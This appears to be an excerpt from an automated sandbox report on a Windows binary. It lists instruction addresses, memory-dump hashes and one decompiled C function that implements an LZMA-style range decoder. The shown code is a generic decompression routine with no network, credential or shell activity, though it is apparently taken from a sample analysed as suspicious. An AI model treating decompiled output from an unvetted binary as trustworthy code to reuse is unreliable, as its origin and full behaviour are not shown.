                                                                                                                                                      0x100091ac
                                                                                                                                                      0x100091ae
                                                                                                                                                      0x100091ae
                                                                                                                                                      0x100091b8
                                                                                                                                                      0x100091bd
                                                                                                                                                      0x100091d3
                                                                                                                                                      0x100091d5
                                                                                                                                                      0x100091de
                                                                                                                                                      0x100091e2
                                                                                                                                                      0x100091bf
                                                                                                                                                      0x100091bf
                                                                                                                                                      0x100091cd
                                                                                                                                                      0x100091cd
                                                                                                                                                      0x100091ea
                                                                                                                                                      0x100091ed
                                                                                                                                                      0x100091f1
                                                                                                                                                      0x100091fd
                                                                                                                                                      0x10009200
                                                                                                                                                      0x10009202
                                                                                                                                                      0x10009202
                                                                                                                                                      0x1000920c
                                                                                                                                                      0x10009211
                                                                                                                                                      0x1000922a
                                                                                                                                                      0x1000922c
                                                                                                                                                      0x10009235
                                                                                                                                                      0x10009239
                                                                                                                                                      0x10009213
                                                                                                                                                      0x10009213
                                                                                                                                                      0x10009221
                                                                                                                                                      0x10009221
                                                                                                                                                      0x10009211
                                                                                                                                                      0x10008fb0
                                                                                                                                                      0x10008fc6
                                                                                                                                                      0x10008fc9
                                                                                                                                                      0x10008fcc
                                                                                                                                                      0x10008fd0
                                                                                                                                                      0x10008fd2
                                                                                                                                                      0x10008fd7
                                                                                                                                                      0x10008fd9
                                                                                                                                                      0x10008fe3
                                                                                                                                                      0x10008fe8
                                                                                                                                                      0x10008fe8
                                                                                                                                                      0x10008ff1
                                                                                                                                                      0x10008ff6
                                                                                                                                                      0x10009011
                                                                                                                                                      0x10009013
                                                                                                                                                      0x1000901c
                                                                                                                                                      0x10009020
                                                                                                                                                      0x10008ff8
                                                                                                                                                      0x10008ff8
                                                                                                                                                      0x10009006
                                                                                                                                                      0x1000900a
                                                                                                                                                      0x1000900a
                                                                                                                                                      0x1000902a
                                                                                                                                                      0x1000902d
                                                                                                                                                      0x10009031
                                                                                                                                                      0x1000903d
                                                                                                                                                      0x10008c8f
                                                                                                                                                      0x10008c92
                                                                                                                                                      0x10008c63
                                                                                                                                                      0x10008c63
                                                                                                                                                      0x10008c75
                                                                                                                                                      0x10008c77
                                                                                                                                                      0x10008c7b
                                                                                                                                                      0x10008c7b
                                                                                                                                                      0x10008ca0
                                                                                                                                                      0x10008ca7
                                                                                                                                                      0x10008cab
                                                                                                                                                      0x10008cae
                                                                                                                                                      0x10008cb0
                                                                                                                                                      0x10008cba
                                                                                                                                                      0x10008cbd
                                                                                                                                                      0x10008cc2
                                                                                                                                                      0x10008cc2
                                                                                                                                                      0x10008ccb
                                                                                                                                                      0x10008cd0
                                                                                                                                                      0x10008cfe
                                                                                                                                                      0x10008d00
                                                                                                                                                      0x10008d0d
                                                                                                                                                      0x10008d10
                                                                                                                                                      0x10008d18
                                                                                                                                                      0x10008d1e
                                                                                                                                                      0x10008cd2
                                                                                                                                                      0x10008cd2
                                                                                                                                                      0x10008ce0
                                                                                                                                                      0x10008ce3
                                                                                                                                                      0x10008cef
                                                                                                                                                      0x10008cf5
                                                                                                                                                      0x10008cf5
                                                                                                                                                      0x10008632
                                                                                                                                                      0x10008635
                                                                                                                                                      0x10008637
                                                                                                                                                      0x10008639
                                                                                                                                                      0x10008639
                                                                                                                                                      0x1000863e
                                                                                                                                                      0x1000864a
                                                                                                                                                      0x1000864e
                                                                                                                                                      0x10008652
                                                                                                                                                      0x10008657
                                                                                                                                                      0x10008660
                                                                                                                                                      0x10008662
                                                                                                                                                      0x10008665
                                                                                                                                                      0x10008665
                                                                                                                                                      0x1000866e
                                                                                                                                                      0x10008673
                                                                                                                                                      0x1000868e
                                                                                                                                                      0x10008690
                                                                                                                                                      0x10008699
                                                                                                                                                      0x1000869d
                                                                                                                                                      0x10008675
                                                                                                                                                      0x10008675
                                                                                                                                                      0x10008683
                                                                                                                                                      0x10008687
                                                                                                                                                      0x10008687
                                                                                                                                                      0x100086a7
                                                                                                                                                      0x100086aa
                                                                                                                                                      0x100086ae
                                                                                                                                                      0x100086b7
                                                                                                                                                      0x100086ba
                                                                                                                                                      0x100086bc
                                                                                                                                                      0x100086bf
                                                                                                                                                      0x100086bf
                                                                                                                                                      0x100086c8
                                                                                                                                                      0x100086cd
                                                                                                                                                      0x100086e3
                                                                                                                                                      0x100086e5
                                                                                                                                                      0x100086ee
                                                                                                                                                      0x100086f2
                                                                                                                                                      0x100086cf
                                                                                                                                                      0x100086cf
                                                                                                                                                      0x100086dd
                                                                                                                                                      0x100086dd
                                                                                                                                                      0x100086f5
                                                                                                                                                      0x100086fc
                                                                                                                                                      0x10008700
                                                                                                                                                      0x10008709
                                                                                                                                                      0x1000870c
                                                                                                                                                      0x1000870e
                                                                                                                                                      0x10008711
                                                                                                                                                      0x10008711
                                                                                                                                                      0x1000871a
                                                                                                                                                      0x1000871f
                                                                                                                                                      0x10008735
                                                                                                                                                      0x10008737
                                                                                                                                                      0x10008740
                                                                                                                                                      0x10008744
                                                                                                                                                      0x10008721
                                                                                                                                                      0x10008721
                                                                                                                                                      0x1000872f
                                                                                                                                                      0x1000872f
                                                                                                                                                      0x10008747
                                                                                                                                                      0x1000874e
                                                                                                                                                      0x10008752
                                                                                                                                                      0x1000875b
                                                                                                                                                      0x1000875e
                                                                                                                                                      0x10008760
                                                                                                                                                      0x10008763
                                                                                                                                                      0x10008763
                                                                                                                                                      0x1000876c
                                                                                                                                                      0x10008771
                                                                                                                                                      0x10008787
                                                                                                                                                      0x10008789
                                                                                                                                                      0x10008792
                                                                                                                                                      0x10008796
                                                                                                                                                      0x10008773
                                                                                                                                                      0x10008773
                                                                                                                                                      0x10008781
                                                                                                                                                      0x10008781
                                                                                                                                                      0x10008799
                                                                                                                                                      0x100087a0
                                                                                                                                                      0x100087a4
                                                                                                                                                      0x100087ad
                                                                                                                                                      0x100087b0
                                                                                                                                                      0x100087b2
                                                                                                                                                      0x100087b5
                                                                                                                                                      0x100087b5
                                                                                                                                                      0x100087be
                                                                                                                                                      0x100087c3
                                                                                                                                                      0x100087d9
                                                                                                                                                      0x100087db
                                                                                                                                                      0x100087e4
                                                                                                                                                      0x100087e8
                                                                                                                                                      0x100087c5
                                                                                                                                                      0x100087c5
                                                                                                                                                      0x100087d3
                                                                                                                                                      0x100087d3
                                                                                                                                                      0x100087eb
                                                                                                                                                      0x100087f2
                                                                                                                                                      0x100087f6
                                                                                                                                                      0x100087ff
                                                                                                                                                      0x10008802
                                                                                                                                                      0x10008804
                                                                                                                                                      0x10008807
                                                                                                                                                      0x10008807
                                                                                                                                                      0x10008810
                                                                                                                                                      0x10008815
                                                                                                                                                      0x1000882b
                                                                                                                                                      0x1000882d
                                                                                                                                                      0x10008836
                                                                                                                                                      0x1000883a
                                                                                                                                                      0x10008817
                                                                                                                                                      0x10008817
                                                                                                                                                      0x10008825
                                                                                                                                                      0x10008825
                                                                                                                                                      0x1000883d
                                                                                                                                                      0x10008844
                                                                                                                                                      0x10008848
                                                                                                                                                      0x10008851
                                                                                                                                                      0x10008854
                                                                                                                                                      0x10008859
                                                                                                                                                      0x10008859
                                                                                                                                                      0x10008862
                                                                                                                                                      0x10008867
                                                                                                                                                      0x1000887d
                                                                                                                                                      0x1000887f
                                                                                                                                                      0x10008888
                                                                                                                                                      0x1000888c
                                                                                                                                                      0x10008869
                                                                                                                                                      0x10008869
                                                                                                                                                      0x10008877
                                                                                                                                                      0x10008877
                                                                                                                                                      0x10008894
                                                                                                                                                      0x10008897
                                                                                                                                                      0x1000889b
                                                                                                                                                      0x1000889d
                                                                                                                                                      0x100088a7
                                                                                                                                                      0x100088aa
                                                                                                                                                      0x100088af
                                                                                                                                                      0x100088af
                                                                                                                                                      0x100088b8

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • Opcode ID: b838d7296990158abbde2e56eb50047ea9ba74e0e9c48dad81e20210eb794b7e
                                                                                                                                                      • Instruction ID: c4c8f5faeaeb0d75ab12717da8dd24621f10186cb63b348e0e1b2faf53cd94e5
                                                                                                                                                      • Opcode Fuzzy Hash: b838d7296990158abbde2e56eb50047ea9ba74e0e9c48dad81e20210eb794b7e
                                                                                                                                                      • Instruction Fuzzy Hash: A602E773A0876147E759CE29CC9421DB7E3FBC03C4F2B452DE89547788DAB09A49C791
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100099E0(void* __eax, signed char* __ecx, signed char* _a4) {
                                                                                                                                                      				signed int _v4;
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				signed char* _v20;
                                                                                                                                                      				intOrPtr _t158;
                                                                                                                                                      				unsigned int _t162;
                                                                                                                                                      				signed int _t165;
                                                                                                                                                      				signed int _t166;
                                                                                                                                                      				intOrPtr _t167;
                                                                                                                                                      				signed int _t168;
                                                                                                                                                      				signed int _t169;
                                                                                                                                                      				signed char* _t170;
                                                                                                                                                      				signed int _t172;
                                                                                                                                                      				signed char* _t173;
                                                                                                                                                      				signed char* _t176;
                                                                                                                                                      				signed char* _t178;
                                                                                                                                                      				signed char* _t180;
                                                                                                                                                      				signed char _t191;
                                                                                                                                                      				signed int _t192;
                                                                                                                                                      				unsigned int _t198;
                                                                                                                                                      				signed char* _t199;
                                                                                                                                                      				signed int _t204;
                                                                                                                                                      				signed char* _t205;
                                                                                                                                                      				signed char* _t207;
                                                                                                                                                      				signed int _t213;
                                                                                                                                                      				signed short* _t214;
                                                                                                                                                      				signed int _t215;
                                                                                                                                                      				signed int _t222;
                                                                                                                                                      				signed char _t228;
                                                                                                                                                      				signed int _t229;
                                                                                                                                                      				signed int _t235;
                                                                                                                                                      				signed char* _t237;
                                                                                                                                                      				signed int _t240;
                                                                                                                                                      				signed int _t244;
                                                                                                                                                      				signed int _t247;
                                                                                                                                                      				signed int _t250;
                                                                                                                                                      				signed int _t253;
                                                                                                                                                      				signed int _t256;
                                                                                                                                                      				signed int _t259;
                                                                                                                                                      				signed char _t263;
                                                                                                                                                      				void* _t264;
                                                                                                                                                      				intOrPtr _t265;
                                                                                                                                                      				signed int _t267;
                                                                                                                                                      				signed char _t279;
                                                                                                                                                      				signed char _t284;
                                                                                                                                                      				signed int _t285;
                                                                                                                                                      				signed int _t286;
                                                                                                                                                      				signed int _t288;
                                                                                                                                                      				signed int _t289;
                                                                                                                                                      				signed int _t290;
                                                                                                                                                      				signed int _t291;
                                                                                                                                                      				signed int _t292;
                                                                                                                                                      				signed int _t293;
                                                                                                                                                      				signed int _t294;
                                                                                                                                                      				signed int _t295;
                                                                                                                                                      				unsigned int _t296;
                                                                                                                                                      				signed char* _t297;
                                                                                                                                                      				intOrPtr _t298;
                                                                                                                                                      				signed char* _t299;
                                                                                                                                                      				signed short* _t301;
                                                                                                                                                      				signed int _t302;
                                                                                                                                                      				signed int _t303;
                                                                                                                                                      				signed int _t304;
                                                                                                                                                      				signed int _t305;
                                                                                                                                                      				signed char* _t306;
                                                                                                                                                      				signed int _t309;
                                                                                                                                                      				signed int _t316;
                                                                                                                                                      				signed int _t321;
                                                                                                                                                      				signed int _t322;
                                                                                                                                                      				signed int _t323;
                                                                                                                                                      				signed int _t324;
                                                                                                                                                      				signed int _t325;
                                                                                                                                                      				signed int _t326;
                                                                                                                                                      				signed int _t327;
                                                                                                                                                      				signed int _t342;
                                                                                                                                                      				signed int _t343;
                                                                                                                                                      				signed char _t344;
                                                                                                                                                      				void* _t348;
                                                                                                                                                      				signed int _t349;
                                                                                                                                                      
                                                                                                                                                      				_t297 = __ecx;
                                                                                                                                                      				_t342 =  *(__ecx + 0x40);
                                                                                                                                                      				_t288 =  *(__ecx + 0x20);
                                                                                                                                                      				_t323 =  *(__ecx + 0x24);
                                                                                                                                                      				_t158 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                                                      				_v20 =  &(_a4[__eax]);
                                                                                                                                                      				_v16 = _t158;
                                                                                                                                                      				_t213 = ((0x00000001 <<  *(__ecx + 2)) - 0x00000001 &  *(__ecx + 0x28)) << 4;
                                                                                                                                                      				_t235 = 1 + _t342;
                                                                                                                                                      				_v4 = _t235;
                                                                                                                                                      				_v12 =  *(_t158 + _t235 * 2 - 0x200) & 0x0000ffff;
                                                                                                                                                      				if(_t288 >= 0x1000000) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t162 = (_t288 >> 0xb) * _v12;
                                                                                                                                                      					if(_t323 >= _t162) {
                                                                                                                                                      						_t298 = _v16;
                                                                                                                                                      						_t289 = _t288 - _t162;
                                                                                                                                                      						_t324 = _t323 - _t162;
                                                                                                                                                      						_v12 =  *(_t298 + 0x20 + _t342 * 2) & 0x0000ffff;
                                                                                                                                                      						_t237 = _a4;
                                                                                                                                                      						if(_t289 >= 0x1000000) {
                                                                                                                                                      							L39:
                                                                                                                                                      							_t165 = (_t289 >> 0xb) * _v12;
                                                                                                                                                      							if(_t324 >= _t165) {
                                                                                                                                                      								_t290 = _t289 - _t165;
                                                                                                                                                      								_t325 = _t324 - _t165;
                                                                                                                                                      								_t166 =  *(_t298 + 0x38 + _t342 * 2) & 0x0000ffff;
                                                                                                                                                      								_v8 = 3;
                                                                                                                                                      								if(_t290 >= 0x1000000) {
                                                                                                                                                      									L44:
                                                                                                                                                      									_t240 = (_t290 >> 0xb) * _t166;
                                                                                                                                                      									_t167 = _v16;
                                                                                                                                                      									if(_t325 >= _t240) {
                                                                                                                                                      										_t299 = _a4;
                                                                                                                                                      										_t291 = _t290 - _t240;
                                                                                                                                                      										_t326 = _t325 - _t240;
                                                                                                                                                      										_v12 =  *(_t167 + 0x50 + _t342 * 2) & 0x0000ffff;
                                                                                                                                                      										if(_t291 >= 0x1000000) {
                                                                                                                                                      											L55:
                                                                                                                                                      											_t244 = (_t291 >> 0xb) * _v12;
                                                                                                                                                      											if(_t326 >= _t244) {
                                                                                                                                                      												_t168 =  *(_t167 + 0x68 + _t342 * 2) & 0x0000ffff;
                                                                                                                                                      												_t292 = _t291 - _t244;
                                                                                                                                                      												_t325 = _t326 - _t244;
                                                                                                                                                      												if(_t292 >= 0x1000000) {
                                                                                                                                                      													L60:
                                                                                                                                                      													_t247 = (_t292 >> 0xb) * _t168;
                                                                                                                                                      													if(_t325 >= _t247) {
                                                                                                                                                      														goto L62;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t293 = _t247;
                                                                                                                                                      													}
                                                                                                                                                      													goto L63;
                                                                                                                                                      												} else {
                                                                                                                                                      													if(_t299 >= _v20) {
                                                                                                                                                      														goto L2;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t292 = _t292 << 8;
                                                                                                                                                      														_t325 = _t325 << 0x00000008 |  *_t299 & 0x000000ff;
                                                                                                                                                      														_a4 =  &(_t299[1]);
                                                                                                                                                      														goto L60;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											} else {
                                                                                                                                                      												_t293 = _t244;
                                                                                                                                                      												goto L63;
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											if(_t299 >= _v20) {
                                                                                                                                                      												goto L2;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t291 = _t291 << 8;
                                                                                                                                                      												_t326 = _t326 << 0x00000008 |  *_t299 & 0x000000ff;
                                                                                                                                                      												_t299 =  &(_t299[1]);
                                                                                                                                                      												_a4 = _t299;
                                                                                                                                                      												goto L55;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t316 =  *(_t167 + _v4 * 2 - 0xc00) & 0x0000ffff;
                                                                                                                                                      										_t180 = _a4;
                                                                                                                                                      										_t292 = _t240;
                                                                                                                                                      										if(_t240 >= 0x1000000) {
                                                                                                                                                      											L48:
                                                                                                                                                      											_t247 = (_t292 >> 0xb) * _t316;
                                                                                                                                                      											if(_t325 >= _t247) {
                                                                                                                                                      												L62:
                                                                                                                                                      												_t293 = _t292 - _t247;
                                                                                                                                                      												_t325 = _t325 - _t247;
                                                                                                                                                      												L63:
                                                                                                                                                      												_t237 = _a4;
                                                                                                                                                      												_v4 = 0xc;
                                                                                                                                                      												_t301 = _v16 + 0xfffff600;
                                                                                                                                                      												goto L64;
                                                                                                                                                      											} else {
                                                                                                                                                      												if(_t247 >= 0x1000000 || _t180 < _v20) {
                                                                                                                                                      													return 3;
                                                                                                                                                      												} else {
                                                                                                                                                      													goto L2;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											if(_t180 >= _v20) {
                                                                                                                                                      												goto L2;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t292 = _t240 << 8;
                                                                                                                                                      												_t325 = _t325 << 0x00000008 |  *_t180 & 0x000000ff;
                                                                                                                                                      												_t180 =  &(_t180[1]);
                                                                                                                                                      												_a4 = _t180;
                                                                                                                                                      												goto L48;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									if(_t237 >= _v20) {
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t290 = _t290 << 8;
                                                                                                                                                      										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
                                                                                                                                                      										_a4 =  &(_t237[1]);
                                                                                                                                                      										goto L44;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t293 = _t165;
                                                                                                                                                      								_v4 = 0;
                                                                                                                                                      								_t301 = _t298 + 0xfffffa00;
                                                                                                                                                      								_v8 = 2;
                                                                                                                                                      								L64:
                                                                                                                                                      								_t169 =  *_t301 & 0x0000ffff;
                                                                                                                                                      								if(_t293 >= 0x1000000) {
                                                                                                                                                      									L67:
                                                                                                                                                      									_t250 = (_t293 >> 0xb) * _t169;
                                                                                                                                                      									_t170 = _a4;
                                                                                                                                                      									if(_t325 >= _t250) {
                                                                                                                                                      										_t343 = _t301[8] & 0x0000ffff;
                                                                                                                                                      										_t294 = _t293 - _t250;
                                                                                                                                                      										_t327 = _t325 - _t250;
                                                                                                                                                      										if(_t294 >= 0x1000000) {
                                                                                                                                                      											L72:
                                                                                                                                                      											_t253 = (_t294 >> 0xb) * _t343;
                                                                                                                                                      											if(_t327 >= _t253) {
                                                                                                                                                      												_t295 = _t294 - _t253;
                                                                                                                                                      												_t327 = _t327 - _t253;
                                                                                                                                                      												_t214 =  &(_t301[0x100]);
                                                                                                                                                      												_t344 = 0x10;
                                                                                                                                                      												_v12 = 0x100;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t344 = 8;
                                                                                                                                                      												_t295 = _t253;
                                                                                                                                                      												_t214 = _t301 + 0x10 + _t213 * 2;
                                                                                                                                                      												_v12 = 8;
                                                                                                                                                      											}
                                                                                                                                                      											goto L75;
                                                                                                                                                      										} else {
                                                                                                                                                      											if(_t170 >= _v20) {
                                                                                                                                                      												goto L2;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t294 = _t294 << 8;
                                                                                                                                                      												_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
                                                                                                                                                      												_t170 =  &(_t170[1]);
                                                                                                                                                      												_a4 = _t170;
                                                                                                                                                      												goto L72;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t295 = _t250;
                                                                                                                                                      										_t214 =  &(_t301[_t213]);
                                                                                                                                                      										_t344 = 0;
                                                                                                                                                      										_v12 = 8;
                                                                                                                                                      										L75:
                                                                                                                                                      										_t302 = 1;
                                                                                                                                                      										L76:
                                                                                                                                                      										while(1) {
                                                                                                                                                      											if(_t295 >= 0x1000000) {
                                                                                                                                                      												L79:
                                                                                                                                                      												_t256 = (_t295 >> 0xb) * (_t214[_t302] & 0x0000ffff);
                                                                                                                                                      												if(_t327 >= _t256) {
                                                                                                                                                      													_t295 = _t295 - _t256;
                                                                                                                                                      													_t327 = _t327 - _t256;
                                                                                                                                                      													_t302 = _t302 + _t302 + 1;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t295 = _t256;
                                                                                                                                                      													_t302 = _t302 + _t302;
                                                                                                                                                      												}
                                                                                                                                                      												_t172 = _v12;
                                                                                                                                                      												if(_t302 >= _t172) {
                                                                                                                                                      													_t303 = _t302 + _t344 - _t172;
                                                                                                                                                      													if(_v4 >= 4) {
                                                                                                                                                      														goto L32;
                                                                                                                                                      													} else {
                                                                                                                                                      														if(_t303 >= 3) {
                                                                                                                                                      															_t303 = 3;
                                                                                                                                                      														}
                                                                                                                                                      														_t173 = _a4;
                                                                                                                                                      														_t129 = _t303 + 1; // 0x4
                                                                                                                                                      														_t348 = (_t129 << 7) + _v16;
                                                                                                                                                      														_t304 = 1;
                                                                                                                                                      														do {
                                                                                                                                                      															_t215 =  *(_t348 + _t304 * 2) & 0x0000ffff;
                                                                                                                                                      															if(_t295 >= 0x1000000) {
                                                                                                                                                      																goto L91;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t176 = _a4;
                                                                                                                                                      																if(_t176 >= _v20) {
                                                                                                                                                      																	goto L2;
                                                                                                                                                      																} else {
                                                                                                                                                      																	_t295 = _t295 << 8;
                                                                                                                                                      																	_t327 = _t327 << 0x00000008 |  *_t176 & 0x000000ff;
                                                                                                                                                      																	_t173 =  &(_t176[1]);
                                                                                                                                                      																	_a4 = _t173;
                                                                                                                                                      																	goto L91;
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      															goto L113;
                                                                                                                                                      															L91:
                                                                                                                                                      															_t259 = (_t295 >> 0xb) * _t215;
                                                                                                                                                      															if(_t327 >= _t259) {
                                                                                                                                                      																_t295 = _t295 - _t259;
                                                                                                                                                      																_t327 = _t327 - _t259;
                                                                                                                                                      																_t304 = _t304 + _t304 + 1;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t295 = _t259;
                                                                                                                                                      																_t304 = _t304 + _t304;
                                                                                                                                                      															}
                                                                                                                                                      														} while (_t304 < 0x40);
                                                                                                                                                      														_t305 = _t304 - 0x40;
                                                                                                                                                      														if(_t305 < 4) {
                                                                                                                                                      															goto L33;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t263 = (_t305 >> 1) - 1;
                                                                                                                                                      															_v12 = _t263;
                                                                                                                                                      															if(_t305 >= 0xe) {
                                                                                                                                                      																_t306 = _v20;
                                                                                                                                                      																_t264 = _t263 - 4;
                                                                                                                                                      																do {
                                                                                                                                                      																	if(_t295 >= 0x1000000) {
                                                                                                                                                      																		goto L102;
                                                                                                                                                      																	} else {
                                                                                                                                                      																		if(_t173 >= _t306) {
                                                                                                                                                      																			goto L2;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			_t295 = _t295 << 8;
                                                                                                                                                      																			_t327 = _t327 << 0x00000008 |  *_t173 & 0x000000ff;
                                                                                                                                                      																			_t173 =  &(_t173[1]);
                                                                                                                                                      																			goto L102;
                                                                                                                                                      																		}
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L113;
                                                                                                                                                      																	L102:
                                                                                                                                                      																	_t295 = _t295 >> 1;
                                                                                                                                                      																	_t327 = _t327 - ((_t327 - _t295 >> 0x0000001f) - 0x00000001 & _t295);
                                                                                                                                                      																	_t264 = _t264 - 1;
                                                                                                                                                      																} while (_t264 != 0);
                                                                                                                                                      																_t265 = _v16;
                                                                                                                                                      																_a4 = _t173;
                                                                                                                                                      																_v12 = 4;
                                                                                                                                                      																goto L104;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t265 = _v16 + ((_t305 & 0x00000001 | 0x00000002) << _t263) * 2 - 0xd00;
                                                                                                                                                      																L104:
                                                                                                                                                      																_t349 = 1;
                                                                                                                                                      																_v16 = _t265;
                                                                                                                                                      																_t222 = 1;
                                                                                                                                                      																do {
                                                                                                                                                      																	_t267 =  *(_v16 + _t349 * 2) & 0x0000ffff;
                                                                                                                                                      																	if(_t295 >= 0x1000000) {
                                                                                                                                                      																		goto L108;
                                                                                                                                                      																	} else {
                                                                                                                                                      																		if(_a4 >= _v20) {
                                                                                                                                                      																			goto L2;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			_t178 = _a4;
                                                                                                                                                      																			_t295 = _t295 << 8;
                                                                                                                                                      																			_t327 = _t327 << 0x00000008 |  *_t178 & 0x000000ff;
                                                                                                                                                      																			_t173 =  &(_t178[1]);
                                                                                                                                                      																			_a4 = _t173;
                                                                                                                                                      																			goto L108;
                                                                                                                                                      																		}
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L113;
                                                                                                                                                      																	L108:
                                                                                                                                                      																	_t309 = (_t295 >> 0xb) * _t267;
                                                                                                                                                      																	if(_t327 >= _t309) {
                                                                                                                                                      																		_t222 = _t222 + _t222;
                                                                                                                                                      																		_t295 = _t295 - _t309;
                                                                                                                                                      																		_t327 = _t327 - _t309;
                                                                                                                                                      																		_t349 = _t349 + _t222;
                                                                                                                                                      																	} else {
                                                                                                                                                      																		_t349 = _t349 + _t222;
                                                                                                                                                      																		_t295 = _t309;
                                                                                                                                                      																		_t222 = _t222 + _t222;
                                                                                                                                                      																	}
                                                                                                                                                      																	_t155 =  &_v12;
                                                                                                                                                      																	 *_t155 = _v12 - 1;
                                                                                                                                                      																} while ( *_t155 != 0);
                                                                                                                                                      																goto L33;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												} else {
                                                                                                                                                      													_t170 = _a4;
                                                                                                                                                      													continue;
                                                                                                                                                      												}
                                                                                                                                                      											} else {
                                                                                                                                                      												if(_t170 >= _v20) {
                                                                                                                                                      													goto L2;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t295 = _t295 << 8;
                                                                                                                                                      													_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
                                                                                                                                                      													_a4 =  &(_t170[1]);
                                                                                                                                                      													goto L79;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											goto L113;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									if(_t237 >= _v20) {
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t293 = _t293 << 8;
                                                                                                                                                      										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
                                                                                                                                                      										_a4 =  &(_t237[1]);
                                                                                                                                                      										goto L67;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_t237 >= _v20) {
                                                                                                                                                      								goto L2;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t289 = _t289 << 8;
                                                                                                                                                      								_t324 = _t324 << 0x00000008 |  *_t237 & 0x000000ff;
                                                                                                                                                      								_t237 =  &(_t237[1]);
                                                                                                                                                      								_a4 = _t237;
                                                                                                                                                      								goto L39;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t296 = _t162;
                                                                                                                                                      						_v16 = _v16 + 0x280;
                                                                                                                                                      						if(_t297[0x2c] != 0 || _t297[0x28] != 0) {
                                                                                                                                                      							_t279 = _t297[0x18];
                                                                                                                                                      							if(_t279 == 0) {
                                                                                                                                                      								_t279 = _t297[0x14];
                                                                                                                                                      							}
                                                                                                                                                      							_v16 = _v16 + ((( *(_t297[0x10] + _t279 - 1) & 0x000000ff) >> 8 - ( *_t297 & 0x000000ff)) + (((0x00000001 << _t297[1]) - 0x00000001 & _t297[0x28]) << ( *_t297 & 0x000000ff))) * 0x600;
                                                                                                                                                      						}
                                                                                                                                                      						if(_t342 >= 7) {
                                                                                                                                                      							_t284 = _t297[0x18];
                                                                                                                                                      							_t228 = _t297[0x30];
                                                                                                                                                      							if(_t284 >= _t228) {
                                                                                                                                                      								_t191 = 0;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t191 = _t297[0x14];
                                                                                                                                                      							}
                                                                                                                                                      							_t229 =  *(_t297[0x10] - _t228 + _t284 + _t191) & 0x000000ff;
                                                                                                                                                      							_t321 = 0x100;
                                                                                                                                                      							_t285 = 1;
                                                                                                                                                      							do {
                                                                                                                                                      								_t192 = _t321;
                                                                                                                                                      								_t229 = _t229 + _t229;
                                                                                                                                                      								_v4 = _t192;
                                                                                                                                                      								_t321 = _t321 & _t229;
                                                                                                                                                      								_v12 =  *(_v16 + (_t192 + _t285 + _t321) * 2) & 0x0000ffff;
                                                                                                                                                      								if(_t296 >= 0x1000000) {
                                                                                                                                                      									goto L27;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t199 = _a4;
                                                                                                                                                      									if(_t199 >= _v20) {
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t296 = _t296 << 8;
                                                                                                                                                      										_t323 = _t323 << 0x00000008 |  *_t199 & 0x000000ff;
                                                                                                                                                      										_a4 =  &(_t199[1]);
                                                                                                                                                      										goto L27;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L113;
                                                                                                                                                      								L27:
                                                                                                                                                      								_t198 = (_t296 >> 0xb) * _v12;
